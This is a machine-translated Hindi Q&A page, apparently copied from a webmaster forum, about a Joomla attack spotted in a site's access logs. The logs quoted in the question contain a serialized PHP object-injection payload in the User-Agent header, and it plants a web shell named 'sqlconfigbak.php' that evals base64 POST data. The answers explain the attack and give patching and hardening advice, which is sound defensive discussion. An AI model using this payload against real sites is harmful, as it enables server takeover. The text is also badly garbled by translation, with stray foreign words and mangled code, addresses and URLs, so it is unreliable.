Back to Question Center
0

उपयोगकर्ता-एजेंट पहचान कुछ स्क्रिप्टिंग हमले तकनीक के लिए इस्तेमाल किया गया था? - मिमल

1 answers:

मेरी साइट पर मिसाल एक्सेस लॉग प्रविष्टियां आमतौर पर इस तरह की होती हैं:

  207. 46. 13. 174 - - [31 / अक्टूबर / 2016: 10: 18: 55 +0100] "प्राप्त / संपर्क करें HTTP / 1. 1 "200 256" - "" मोज़िला / 5. 0 (संगत; बिंगबॉट / 2 com / bingbot - мешок пуф. एचटीएम) "0. 607 मिस 10. 10. 36. 125: 104 0. 607 

ताकि आप वहां उपयोगकर्ता-एजेंट फ़ील्ड देख सकें. लेकिन आज मुझे यह भी पाया गया कि इस तरह से उपयोगकर्ता-एजेंट फ़ील्ड का इस्तेमाल किया गया है:

  62. 210. 162. 42 - - [31 / अक्टूबर / 2016: 11: 24: 19 +0100] "प्राप्त / HTTP / 1. 1: 2: "एफसी"; ओ: 17: "जेसमप्लेफैटरिनेटर": 0: {} s: 21: "\ 0 \", "जेडबेसड्रायवर मिस्कीली": 3: 0 \ 0disconnectHandlers ", एक: 1: {मैं: 0; एक: 2: {मैं: 0; हे: 9:" SimplePie ": 5: {s: 8:" स्वच्छ ", हे: 20:" JDatabaseDriverMysql ": 0: {} है: 8: "FEED_URL"; s: 242: "file_put_contents ($ _ सर्वर [" DOCUMENT_ROOT "]. chr (47). "sqlconfigbak. php "" | = | \ x3C ". chr (63). "php \ x24mujj = \ x24_POST ['z']; अगर (\ x24mujj! = '') {\ x24xsser = base64_decode (\ x24_POST ['z0']); @ eval (\" \\\ x24safedg = \ x24xsser; \ ");}"); JFactory :: getConfig  
; बाहर निकलें, "की: 19:" cache_name_function "की: 6:" जोर "की: 5:" कैश ", ख: 1; रों: 11 : "cache_class"; हे: 20: "JDatabaseDriverMysql": 0: {}} मैं: 1; रों: 4: "init";}} रों: 13: "\ 0 \ 0 \ 0connection"; ख: 1;} ~ Ů "0. 304 बाईपास 10. 10. 36. 125: 104 0. 304

क्या यह एक हमला था? अगले लॉग प्रविष्टि को सफलतापूर्वक पुनर्प्राप्त (कोड 200) फ़ाइल sqlconfigbak प्रतीत होता है. स्क्रिप्ट में उल्लिखित php . यद्यपि मैं फ़ाइल सिस्टम में फ़ाइल नहीं ढूँढ सकता:

  62. 210. 162. 42 - - [31 / अक्टूबर / 2016: 11: 24: 20 +0100] "GET // sqlconfigbak. php HTTP / 1. 1 "200 3 9 9" http: // www. googlebot. कॉम / बोट. html "" मोज़िला / 5. 0 (संगत; Googlebot / 2. 1; + Http: // www. गूगल. कॉम / बोट. html) "0. 10. 36. 125: 104 0. 244  

क्या यहाँ क्या हो रहा है?

February 6, 2018
. जानकारी यहां मिली: https: // blog. Sucuri. शुद्ध / 2015/12 / रिमोट कमांड निष्पादन-जोखिम में जूमला. html

__test के बावजूद यह एक भेद्यता परीक्षण नहीं है. यह एक हमला है.

सुनिश्चित करें कि किसी भी जूमला इंस्टॉल की तारीख के अनुसार यथासंभव संभव है.

एक और विकल्प का उपयोग करना है. एक सामान्य स्ट्रिंग की तलाश करके इसे रोकना htaccess, "__test" काम करेगा, और किसी अन्य जगह पर रीडायरेक्ट.

आपके द्वारा लिंक किया गया आईपी पता Google होस्टनाम को हल नहीं करता है इसलिए यह Google नहीं है. व्यक्ति या बॉट आपकी साइट को कमजोरियों के लिए स्कैन कर रहा है. पहले एक जूमला भेद्यता को ढूंढने का प्रयास कर रहा है.

ये घटनाएं अधिकांश वेबसाइटों पर एक नियमित घटनाएं हैं, आपको यह सुनिश्चित करना चाहिए कि आप सर्वोत्तम प्रथाओं का पालन कर रहे हैं और अपनी वेबसाइट को कठोर कर सकते हैं, प्रक्रिया लंबी है और आपको एक ऑनलाइन ट्यूटोरियल खोजने और अनुसरण करने की आवश्यकता होगी.

अन्य उत्तरों के अतिरिक्त, ध्यान दें कि इस हमले ने जाहिरा तौर पर काम किया है, सुझाव है कि आप PHP का एक पुराना, असुरक्षित संस्करण चला रहे हैं. सितंबर 2015 में इस हमले का फायदा उठाते हुए बग के लिए एक फिक्स. अपनी अद्यतन प्रक्रिया चलाएं और सुनिश्चित करें कि यह PHP के नवीनतम संस्करण में खींचती है. और अन्य पुरानी कार्यक्रमों की जांच करें जो इंटरनेट का सामना कर रहे हैं, भी, जैसा लगता है कि आपका सर्वर कम से कम एक वर्ष के लिए अप-टू-डेट नहीं रखा गया है.